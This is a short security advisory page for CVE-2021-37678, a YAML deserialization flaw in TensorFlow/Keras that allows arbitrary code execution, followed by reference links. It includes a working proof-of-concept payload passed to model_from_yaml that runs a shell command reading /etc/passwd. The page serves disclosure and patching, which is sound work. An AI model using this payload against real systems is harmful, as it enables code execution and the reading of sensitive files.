CVE-2021-37678: Arbitrary code execution due to YAML deserialization
(updated )
TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format.
from tensorflow.keras import models
payload = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''
models.model_from_yaml(payload)
References
- github.com/advisories/GHSA-r6jx-9g48-2r5r
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-591.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-789.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-300.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1df5a69e9f1a18a937e7907223066e606bf466b9
- github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
- github.com/tensorflow/tensorflow/commit/8e47a685785bef8f81bcb996048921dfde08a9ab
- github.com/tensorflow/tensorflow/commit/a09ab4e77afdcc6e1e045c9d41d5edab63aafc1a
- github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
- nvd.nist.gov/vuln/detail/CVE-2021-37678
Detect and mitigate CVE-2021-37678 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →